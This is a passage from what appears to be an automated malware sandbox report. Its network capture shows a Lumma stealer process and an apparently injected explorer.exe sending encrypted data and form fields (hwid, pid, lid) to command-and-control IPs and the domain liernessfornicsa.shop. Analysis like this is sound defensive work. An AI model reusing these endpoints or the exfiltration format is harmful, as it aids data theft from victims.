6e Data Ascii: PSivHhaOGtabKBc9TKUoK3kXo7ux77u010F2DJ2OiXI87IweVr4ax48ZY5zIRZhPTNOXXwUe6iHylZQ8bZ6YgjzojbrH+vrXOyxn3HjFiH/M4yOawa5rlWdh94xtXknC7Bz8HldOGhcvGUO43EFYnviWJ1kBL4rG1yCGOFwqCDYMfEhLom5qJw/5M3w49Yh/bINzO1EOGyW3YZdsjS4JouyM3A6G+v5D/1hn2VymWD+8I2d4sS57RYZ1lti8Sun
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 33 64 34 33 0d 0a 71 56 32 2b 35 63 76 78 34 5a 62 6e 50 72 44 50 7a 75 79 46 4f 61 36 58 6e 41 58 65 4d 36 64 6f 4e 6f 6e 32 49 69 63 6f 6b 6e 69 75 6d 33 34 6c 53 79 50 76 31 61 41 2b 63 34 73 64 61 46 66 38 50 70 59 66 56 6b 71 68 64 62 6f 6c 69 7a 41 7a 74 62 73 61 66 32 67 62 66 61 51 4f 63 47 45 58 49 50 34 7a 43 67 78 76 67 50 6f 76 31 68 2f 46 47 44 41 6e 61 44 61 4a 39 69 49 6e 4b 4a 63 32 36 31 76 34 35 6c 2f 2b 49 6c 62 67 50 44 66 65 69 72 77 43 4b 6d 39 55 7a 46 42 4d 73 62 52 34 35 4d 6c 7a 39 72 4f 37 6d 66 39 72 58 62 37 6c 44 7a 44 68 56 36 43 38 74 73 78 4f 72 59 65 36 4c 64 53 65 68 31 79 68 5a 4f 75 6e 54 69 41 6b 49 54 44 61 2b 43 34 66 4f 50 63 43 4d 36 45 57 34 6e 68 69 53 56 37 70 31 48 75 74 68 38 70 57 58 50 4a 30 65 2b 56 4a 73 Data Ascii: 3d43qV2+5cvx4ZbnPrDPzuyFOa6XnAXeM6doNon2Iicoknium34lSyPv1aA+c4sdaFf8PpYfVkqhdbolizAztbsaf2gbfaQOcGEXIP4zCgxvgPov1h/FGDAnaDaJ9iInKJc261v45l/+IlbgPDfeirwCKm9UzFBMsbR45Mlz9rO7mf9rXb7lDzDhV6C8tsxOrYe6LdSeh1yhZOunTiAkITDa+C4fOPcCM6EW4nhiSV7p1Huth8pWXPJ0e+VJs
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 62 65 75 75 66 2f 2b 56 4d 38 4f 44 57 59 62 37 7a 69 67 34 75 78 6e 6a 73 31 70 39 46 48 48 58 33 75 2f 61 62 6f 44 50 33 4b 49 2b 72 34 31 4d 78 62 31 39 30 73 52 4d 7a 76 44 46 65 6d 33 2b 45 4f 47 39 55 58 55 4c 66 4e 66 54 36 5a 6f 6d 79 4d 44 44 37 6d 6a 68 75 48 66 7a 6e 6a 50 43 67 6c 79 4b 39 73 30 2b 4f 62 6c 52 70 2f 70 59 61 56 6b 71 68 66 58 74 67 44 71 43 35 73 2f 69 59 66 2b 38 5a 4c 4b 42 63 39 54 4b 55 6f 4b 33 6b 58 6f 78 74 52 76 67 75 56 5a 31 46 48 4c 4d 30 75 65 53 4c 63 6a 61 78 65 68 30 36 36 39 2b 2f 5a 51 35 78 59 5a 61 67 76 50 62 4d 58 58 77 55 65 36 69 48 79 6c 5a 55 73 37 4c 7a 59 67 79 67 4e 65 4b 2b 79 62 6f 70 6a 2b 71 33 6a 54 42 69 31 53 45 38 63 49 2f 4f 4c 34 55 34 37 31 54 63 52 6c 78 77 39 76 6a 6b 69 6a 4d 78 4d 66 Data Ascii: beuuf/+VM8ODWYb7zig4uxnjs1p9FHHX3u/aboDP3KI+r41Mxb190sRMzvDFem3+EOG9UXULfNfT6ZomyMDD7mjhuHfznjPCglyK9s0+OblRp/pYaVkqhfXtgDqC5s/iYf+8ZLKBc9TKUoK3kXoxtRvguVZ1FHLM0ueSLcjaxeh0669+/ZQ5xYZagvPbMXXwUe6iHylZUs7LzYgygNeK+ybopj+q3jTBi1SE8cI/OL4U471TcRlxw9vjkijMxMf
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 6e 54 30 6b 44 7a 4c 68 6c 6a 4f 75 59 6b 39 4c 66 35 4a 71 5a 31 46 66 42 39 6c 31 4f 6a 70 6d 6e 47 41 31 34 72 37 4a 75 69 6d 50 36 72 65 4d 4d 47 41 57 49 76 7a 77 54 30 32 76 78 33 74 74 31 4a 31 45 48 62 41 7a 2f 79 63 4c 73 44 48 79 75 31 71 2f 61 52 36 38 70 4a 39 67 38 70 53 6c 72 65 52 65 67 53 70 45 61 6d 6c 45 57 68 5a 64 63 6d 64 74 74 6f 76 7a 64 72 49 37 57 62 75 71 58 76 35 6d 54 76 4c 69 31 61 4c 39 4d 77 38 4e 4c 34 64 34 37 31 58 65 78 64 2f 77 39 6e 6f 6e 47 43 4f 69 4d 50 36 4a 72 66 71 54 66 2b 51 4e 4d 36 4d 57 4a 6a 66 2b 48 6f 71 38 41 69 70 76 56 4d 78 51 54 4c 42 31 75 61 57 4a 63 6a 4e 78 65 70 73 35 36 56 77 34 4a 38 79 78 49 31 65 67 2f 6a 48 50 7a 75 73 46 75 4b 78 56 33 67 58 64 49 57 54 72 70 30 34 67 4a 43 45 31 47 58 68 Data Ascii: nT0kDzLhljOuYk9Lf5JqZ1FfB9l1OjpmnGA14r7JuimP6reMMGAWIvzwT02vx3tt1J1EHbAz/ycLsDHyu1q/aR68pJ9g8pSlreRegSpEamlEWhZdcmdttovzdrI7WbuqXv5mTvLi1aL9Mw8NL4d471Xexd/w9nonGCOiMP6JrfqTf+QNM6MWJjf+Hoq8AipvVMxQTLB1uaWJcjNxeps56Vw4J8yxI1eg/jHPzusFuKxV3gXdIWTrp04gJCE1GXh
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 6f 7a 33 34 74 61 7a 72 6d 4a 50 53 33 2b 53 61 6d 4c 53 58 59 65 66 59 66 30 36 59 45 68 79 73 76 50 37 69 62 77 35 47 61 79 6d 54 47 4e 30 68 57 44 2b 38 51 2b 4a 37 49 52 36 62 4e 59 65 77 74 39 79 74 44 74 6d 69 58 53 79 64 62 74 62 65 71 70 65 2f 32 52 4d 63 57 41 46 63 43 33 7a 69 4a 31 35 6c 48 46 75 55 35 37 57 31 58 66 79 2b 6d 57 4d 63 76 46 79 4b 4a 35 6f 62 4d 2f 39 5a 4a 39 6c 63 70 56 6a 2f 72 62 50 7a 53 30 47 2b 53 79 55 48 51 63 66 63 48 5a 35 5a 51 79 7a 73 66 45 35 47 33 75 72 33 7a 35 6c 44 50 45 6d 42 58 41 74 38 34 69 64 65 5a 52 77 36 46 65 66 42 55 77 36 39 62 34 6e 57 4c 68 78 73 2f 6c 61 76 6e 71 59 4c 79 48 66 63 71 47 46 64 61 33 77 44 51 35 76 52 62 68 73 6c 70 78 45 6e 4c 4b 31 2b 43 64 4d 73 72 45 7a 76 42 70 37 4b 64 37 2f Data Ascii: oz34tazrmJPS3+SamLSXYefYf06YEhysvP7ibw5GaymTGN0hWD+8Q+J7IR6bNYewt9ytDtmiXSydbtbeqpe/2RMcWAFcC3ziJ15lHFuU57W1Xfy+mWMcvFyKJ5obM/9ZJ9lcpVj/rbPzS0G+SyUHQcfcHZ5ZQyzsfE5G3ur3z5lDPEmBXAt84ideZRw6FefBUw69b4nWLhxs/lavnqYLyHfcqGFda3wDQ5vRbhslpxEnLK1+CdMsrEzvBp7Kd7/
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 48 57 34 62 6c 79 6e 70 37 2f 68 62 78 2b 67 63 78 4b 33 6a 47 30 66 69 58 4c 34 44 58 69 76 73 6d 36 4b 59 2f 71 74 34 76 33 34 70 65 6a 76 44 48 4b 44 53 32 48 75 4f 36 57 58 6f 54 63 63 7a 5a 34 4a 4d 6d 77 63 58 46 34 32 62 71 71 6e 62 67 6b 33 32 44 79 6c 4b 57 74 35 46 36 41 72 49 61 32 4c 6c 4a 4d 51 59 38 33 4a 33 70 6c 6d 43 59 69 4d 58 77 61 2b 65 75 66 2f 2b 59 4e 73 79 4c 56 6f 37 33 79 6a 6f 77 74 52 37 76 76 56 4a 37 45 48 76 58 31 65 71 49 49 4d 7a 4d 68 4b 77 6d 36 4c 49 2f 71 74 34 4e 7a 6f 46 5a 6a 76 72 63 65 69 72 77 43 4b 6d 39 55 7a 46 42 4d 73 33 57 35 5a 77 72 77 38 76 4b 36 57 7a 67 70 58 58 30 6d 44 58 49 69 6c 6d 4f 38 73 38 2b 4d 62 41 57 35 37 64 65 59 78 70 37 68 5a 4f 75 6e 54 69 41 6b 49 54 43 62 66 6d 76 65 4f 54 63 43 4d Data Ascii: HW4blynp7/hbx+gcxK3jG0fiXL4DXivsm6KY/qt4v34pejvDHKDS2HuO6WXoTcczZ4JMmwcXF42bqqnbgk32DylKWt5F6ArIa2LlJMQY83J3plmCYiMXwa+euf/+YNsyLVo73yjowtR7vvVJ7EHvX1eqIIMzMhKwm6LI/qt4NzoFZjvrceirwCKm9UzFBMs3W5Zwrw8vK6WzgpXX0mDXIilmO8s8+MbAW57deYxp7hZOunTiAkITCbfmveOTcCM
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 74 35 46 6f 65 2f 34 44 71 65 49 66 4e 68 70 67 31 39 76 74 6a 43 4f 48 39 76 72 43 62 65 4f 70 63 2f 4f 5a 66 59 50 4b 57 73 36 76 38 48 6f 32 72 41 4f 6d 71 30 6c 38 43 58 57 4a 31 66 2b 58 4c 49 43 47 68 4b 35 69 35 4b 5a 36 39 59 35 79 33 35 70 65 67 75 47 46 50 69 66 2b 58 36 6d 72 56 48 34 4c 66 4d 4b 53 2f 34 77 74 30 4d 76 42 35 53 72 6e 75 33 4c 2b 33 6e 4f 4e 6e 31 36 43 38 63 51 76 65 71 38 48 36 71 78 59 50 52 46 6a 79 4e 47 75 70 57 36 41 30 49 53 36 4a 74 71 70 63 66 79 5a 4b 39 7a 48 64 59 58 37 79 6a 59 30 75 56 47 6e 2b 6c 6b 78 51 53 47 4c 6e 65 71 4c 59 4a 69 59 6c 72 6b 7a 76 50 30 76 6f 49 46 7a 31 4d 70 44 7a 71 2b 62 64 48 57 73 55 62 48 36 47 48 49 4c 59 4d 50 65 2b 4a 6c 6e 2f 76 62 46 37 32 6d 6a 70 48 54 79 6d 53 33 62 6b 52 6d Data Ascii: t5Foe/4DqeIfNhpg19vtjCOH9vrCbeOpc/OZfYPKWs6v8Ho2rAOmq0l8CXWJ1f+XLICGhK5i5KZ69Y5y35peguGFPif+X6mrVH4LfMKS/4wt0MvB5Srnu3L+3nONn16C8cQveq8H6qxYPRFjyNGupW6A0IS6JtqpcfyZK9zHdYX7yjY0uVGn+lkxQSGLneqLYJiYlrkzvP0voIFz1MpDzq+bdHWsUbH6GHILYMPe+Jln/vbF72mjpHTymS3bkRm
2024-07-27 06:54:44 UTC	1369	IN	Data Raw: 43 57 7a 48 75 36 45 59 55 59 49 64 64 57 66 79 4a 6b 32 77 34 69 4b 6f 6e 36 76 38 6a 2f 54 6c 43 33 41 68 56 4c 4f 36 49 63 6a 64 61 68 52 73 65 6b 52 4d 51 73 79 6e 5a 32 70 6c 43 33 42 79 38 72 68 64 50 32 73 66 4f 53 64 65 76 4f 30 63 49 50 36 7a 44 51 79 67 43 2f 49 73 45 39 38 46 6e 57 48 2f 65 6d 4d 49 2f 37 32 38 2f 4e 68 2f 2b 68 5a 38 59 67 2b 6a 63 51 56 6c 72 65 52 65 68 53 30 41 65 53 31 57 44 4d 35 64 64 50 65 72 6f 56 75 32 59 6a 53 6f 6a 36 38 35 44 2f 67 33 6d 57 4e 7a 56 61 63 35 63 38 35 49 37 31 57 31 34 52 79 59 78 35 69 78 70 2f 66 6c 79 54 57 33 63 66 79 59 64 47 55 55 75 43 5a 4c 63 37 49 5a 4a 6a 30 79 54 51 79 2f 6c 2b 70 6f 68 38 70 57 56 2f 58 32 76 36 5a 59 4e 2b 47 33 61 4a 77 72 2f 49 73 76 4e 34 76 6a 64 49 56 79 66 6e 45 Data Ascii: CWzHu6EYUYIddWfyJk2w4iKon6v8j/TlC3AhVLO6IcjdahRsekRMQsynZ2plC3By8rhdP2sfOSdevO0cIP6zDQygC/IsE98FnWH/emMI/728/Nh/+hZ8Yg+jcQVlreRehS0AeS1WDM5ddPeroVu2YjSoj685D/g3mWNzVac5c85I71W14RyYx5ixp/flyTW3cfyYdGUUuCZLc7IZJj0yTQy/l+poh8pWV/X2v6ZYN+G3aJwr/IsvN4vjdIVyfnE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50738	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:44 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:44 UTC	1267	OUT	Data Raw: 48 57 6b 46 46 42 63 77 55 36 4d 4e 69 65 2f 35 74 53 59 2f 4d 68 38 66 64 37 38 35 6e 58 71 65 4e 2b 76 77 79 71 5a 45 65 63 6d 49 65 43 39 49 4b 50 69 58 62 5a 55 48 68 42 62 64 76 7a 49 66 35 45 53 2f 6a 49 31 32 6d 77 46 54 62 6f 4b 4b 33 71 6e 75 36 5a 62 72 55 36 73 62 45 2f 6d 47 2f 47 72 69 4b 6c 4a 65 4d 4a 6a 6a 42 37 6c 6d 68 67 79 71 73 49 79 37 47 45 69 4f 78 5a 6c 55 34 79 30 34 2f 54 63 52 46 76 42 6c 39 35 4d 6b 57 6c 63 47 39 54 39 57 4d 6a 73 56 71 77 46 33 54 5a 78 49 6f 68 76 63 2b 36 58 6b 4f 71 71 52 48 49 72 46 31 2b 72 46 39 44 6d 55 31 4f 48 71 33 33 37 34 4a 68 7a 68 39 64 6f 4f 78 78 65 2f 67 41 75 59 68 72 72 75 4d 53 6c 46 2b 4f 6a 37 4d 65 62 78 55 46 35 4b 46 6a 42 45 35 79 42 54 53 79 55 7a 71 44 54 35 75 77 4b 4b 34 55 49 Data Ascii: HWkFFBcwU6MNie/5tSY/Mh8fd785nXqeN+vwyqZEecmIeC9IKPiXbZUHhBbdvzIf5ES/jI12mwFTboKK3qnu6ZbrU6sbE/mG/GriKlJeMJjjB7lmhgyqsIy7GEiOxZlU4y04/TcRFvBl95MkWlcG9T9WMjsVqwF3TZxIohvc+6XkOqqRHIrF1+rF9DmU1OHq3374Jhzh9doOxxe/gAuYhrruMSlF+Oj7MebxUF5KFjBE5yBTSyUzqDT5uwKK4UI
2024-07-27 06:54:45 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:45 UTC	685	IN	Data Raw: 30 75 63 39 46 4c 2b 79 4e 38 33 31 62 7a 38 50 57 49 67 4b 38 76 31 6a 67 7a 67 52 76 38 42 52 50 4f 78 54 47 33 47 4d 74 73 6a 37 6c 52 74 4e 38 61 55 67 64 37 36 50 6e 54 61 66 56 75 33 61 4e 67 6a 4f 46 76 30 57 33 6e 39 6f 54 79 61 58 6d 6d 77 65 79 4a 63 6d 41 73 6d 61 47 59 54 76 67 70 46 6a 4b 7a 6c 49 73 54 42 64 54 31 4c 4d 7a 6c 35 6d 76 66 44 37 6a 6b 75 2b 33 42 39 2b 2b 46 4b 4b 4c 2b 7a 6d 65 44 63 45 6d 2b 54 59 73 6d 54 4b 6b 77 31 71 51 54 5a 63 34 34 58 62 59 50 31 71 32 61 49 56 58 57 41 64 67 74 78 5a 53 58 32 62 7a 62 37 49 55 52 57 30 69 35 41 46 5a 4e 76 39 37 55 30 67 66 48 6c 42 4a 59 44 34 75 71 6a 4b 76 59 73 4a 4b 2f 43 67 69 33 2b 34 33 54 70 67 47 55 36 67 52 55 43 32 30 34 67 74 59 48 70 67 71 79 47 2b 6d 71 51 34 47 33 58 Data Ascii: 0uc9FL+yN831bz8PWIgK8v1jgzgRv8BRPOxTG3GMtsj7lRtN8aUgd76PnTafVu3aNgjOFv0W3n9oTyaXmmweyJcmAsmaGYTvgpFjKzlIsTBdT1LMzl5mvfD7jku+3B9++FKKL+zmeDcEm+TYsmTKkw1qQTZc44XbYP1q2aIVXWAdgtxZSX2bzb7IURW0i5AFZNv97U0gfHlBJYD4uqjKvYsJK/Cgi3+43TpgGU6gRUC204gtYHpgqyG+mqQ4G3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50740	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:45 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:45 UTC	1122	OUT	Data Raw: 61 38 77 6e 48 33 51 68 4a 42 43 68 69 52 73 55 69 58 63 56 30 36 53 65 35 52 41 62 46 65 66 67 68 71 78 70 44 46 75 61 6f 45 7a 49 4d 35 7a 68 31 4f 34 2f 34 4f 6c 31 4d 48 56 78 32 47 35 64 35 72 6f 48 52 4f 39 68 52 54 46 73 33 2b 76 78 52 6b 64 36 2b 7a 47 65 4f 33 36 2b 30 71 4f 47 6b 6b 5a 42 6d 63 74 6b 69 4f 59 51 41 55 58 77 74 6c 46 6e 38 31 71 45 6c 39 65 48 31 56 35 35 2b 52 79 6f 50 4b 49 59 4c 4c 55 32 48 75 4f 72 54 42 68 48 76 58 57 54 45 63 4f 6a 35 6f 62 34 46 65 6a 4b 33 57 4e 2b 2b 5a 74 56 2b 4b 46 57 48 33 76 73 36 44 52 75 48 6d 52 31 65 44 38 55 37 6a 58 56 45 4e 6d 73 38 72 77 56 51 53 73 43 56 30 65 6d 38 7a 7a 61 74 78 44 7a 53 4d 41 30 68 2f 79 34 77 54 72 59 4b 54 30 54 43 6a 46 6e 30 78 6b 73 33 67 32 44 42 57 4f 66 34 61 31 Data Ascii: a8wnH3QhJBChiRsUiXcV06Se5RAbFefghqxpDFuaoEzIM5zh1O4/4Ol1MHVx2G5d5roHRO9hRTFs3+vxRkd6+zGeO36+0qOGkkZBmctkiOYQAUXwtlFn81qEl9eH1V55+RyoPKIYLLU2HuOrTBhHvXWTEcOj5ob4FejK3WN++ZtV+KFWH3vs6DRuHmR1eD8U7jXVENms8rwVQSsCV0em8zzatxDzSMA0h/y4wTrYKT0TCjFn0xks3g2DBWOf4a1
2024-07-27 06:54:47 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:47 UTC	685	IN	Data Raw: 54 77 49 39 54 2f 64 48 58 6e 71 75 76 4b 52 72 30 54 52 76 66 59 4f 56 7a 65 30 46 49 6f 47 4f 56 34 43 65 6a 6d 35 34 62 48 56 74 46 62 75 64 46 30 74 4a 30 38 68 35 31 72 46 47 43 4a 77 30 51 67 4b 39 49 39 58 63 69 41 4d 45 73 73 54 74 55 5a 49 77 30 59 7a 4e 6c 35 62 6c 37 33 79 79 61 59 37 5a 67 31 51 30 67 45 39 75 6d 4a 70 65 72 6d 64 54 63 64 68 56 69 53 64 38 4b 57 34 38 31 68 6d 36 48 71 61 6d 4c 33 4d 42 4c 32 53 65 6a 5a 38 63 4a 2b 63 46 30 65 4c 5a 39 44 4d 6d 2b 6a 59 77 59 64 48 6c 46 73 7a 33 79 69 36 52 4a 7a 6d 4a 41 63 55 71 2b 37 57 74 71 78 78 69 50 44 4c 38 71 48 59 33 54 4e 41 2b 6a 78 69 37 46 33 53 79 6a 52 34 2b 77 37 78 37 67 77 33 37 6a 6a 6a 37 78 2f 75 53 6a 32 6d 64 4a 31 4a 46 4d 44 58 52 6e 64 4e 67 5a 30 53 45 62 37 2f Data Ascii: TwI9T/dHXnquvKRr0TRvfYOVze0FIoGOV4Cejm54bHVtFbudF0tJ08h51rFGCJw0QgK9I9XciAMEssTtUZIw0YzNl5bl73yyaY7Zg1Q0gE9umJpermdTcdhViSd8KW481hm6HqamL3MBL2SejZ8cJ+cF0eLZ9DMm+jYwYdHlFsz3yi6RJzmJAcUq+7WtqxxiPDL8qHY3TNA+jxi7F3SyjR4+w7x7gw37jjj7x/uSj2mdJ1JFMDXRndNgZ0SEb7/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50741	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:48 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: liernessfornicsa.shop
2024-07-27 06:54:48 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 06:54:48 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-07-27 06:54:48 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eonlp7senl7qpc457locat38s4; expires=Wed, 20-Nov-2024 00:41:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SB%2BMbFi%2FGBMunLT0KhVfN1drVDGh8%2BYAj6sld0B2VrJhq5P%2FCD1miAmincwyTQvDq0c%2FYTPBH2tqqYGIL877ovkR9ewzCPMysQc2EAAAaj%2B1B6XRWYY59gbdWeANGJD9o34cv2y7IgM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab85ed8cd8c87-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:48 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50742	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:48 UTC	1122	OUT	Data Raw: 69 68 37 47 7a 30 48 6a 45 73 49 49 4c 37 5a 46 67 6d 63 55 53 71 30 45 59 45 6a 6e 41 77 38 79 48 6d 48 51 41 66 76 33 6c 78 6a 6b 36 63 56 6b 4e 59 66 4b 44 56 52 68 51 79 71 2b 33 54 54 58 32 46 36 42 37 75 43 42 65 41 70 42 72 30 66 37 32 70 2b 42 79 6f 7a 70 6d 52 4b 53 4f 4e 68 38 79 4d 39 52 6f 53 56 2f 6b 50 63 5a 7a 39 51 6e 30 68 6f 73 52 2f 42 77 4e 61 72 34 54 2b 43 6a 79 47 4d 4c 46 5a 59 77 37 66 66 74 55 39 55 33 34 58 70 34 33 79 5a 5a 6a 44 47 6e 45 38 36 68 68 4a 64 35 63 41 76 6b 72 61 62 52 58 37 6c 49 58 65 72 42 7a 76 57 56 6b 78 4d 6e 6f 47 32 4e 61 69 4a 75 4d 6b 71 61 30 45 70 51 70 6c 42 49 45 62 5a 62 52 58 39 39 67 54 36 4d 6a 70 42 38 42 35 47 6e 4f 4f 39 50 4d 6e 55 51 72 45 72 4c 67 54 45 54 56 38 6c 6e 42 57 38 55 49 50 57 Data Ascii: ih7Gz0HjEsIIL7ZFgmcUSq0EYEjnAw8yHmHQAfv3lxjk6cVkNYfKDVRhQyq+3TTX2F6B7uCBeApBr0f72p+ByozpmRKSONh8yM9RoSV/kPcZz9Qn0hosR/BwNar4T+CjyGMLFZYw7fftU9U34Xp43yZZjDGnE86hhJd5cAvkrabRX7lIXerBzvWVkxMnoG2NaiJuMkqa0EpQplBIEbZbRX99gT6MjpB8B5GnOO9PMnUQrErLgTETV8lnBW8UIPW
2024-07-27 06:54:49 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:49 UTC	685	IN	Data Raw: 44 54 41 7a 53 2b 38 2b 63 35 70 63 66 7a 44 32 46 68 37 38 72 55 65 73 6b 4b 50 74 6e 6c 56 52 45 6d 44 53 74 6a 33 6c 46 43 4c 7a 51 34 55 78 76 4a 67 41 57 51 50 48 44 63 66 61 38 4b 52 49 65 77 41 66 6f 43 39 45 5a 58 64 63 68 33 7a 6d 72 34 4c 4f 41 72 50 32 6f 38 41 4f 54 4b 74 4d 41 65 61 55 69 30 67 69 4c 48 73 44 68 6b 5a 39 56 64 4d 45 46 66 57 48 47 63 73 5a 6d 68 66 56 6a 44 50 6f 59 6a 6b 69 6d 73 6f 76 42 51 46 4b 4d 77 48 75 6a 6f 36 62 77 52 4f 75 68 58 2b 37 32 48 67 6d 41 6b 34 56 4f 5a 4b 6e 67 69 71 65 72 5a 42 45 41 44 61 63 64 56 6e 49 2f 4b 55 46 6b 47 4f 33 6a 75 48 37 76 77 5a 44 73 54 72 7a 32 41 61 57 73 41 2f 53 2b 4f 6e 77 67 65 45 4f 38 45 6d 48 72 4b 7a 63 46 57 35 4f 4d 35 44 36 64 4b 74 4e 57 68 36 6c 33 66 34 4f 4c 54 75 Data Ascii: DTAzS+8+c5pcfzD2Fh78rUeskKPtnlVREmDStj3lFCLzQ4UxvJgAWQPHDcfa8KRIewAfoC9EZXdch3zmr4LOArP2o8AOTKtMAeaUi0giLHsDhkZ9VdMEFfWHGcsZmhfVjDPoYjkimsovBQFKMwHujo6bwROuhX+72HgmAk4VOZKngiqerZBEADacdVnI/KUFkGO3juH7vwZDsTrz2AaWsA/S+OnwgeEO8EmHrKzcFW5OM5D6dKtNWh6l3f4OLTu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50743	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
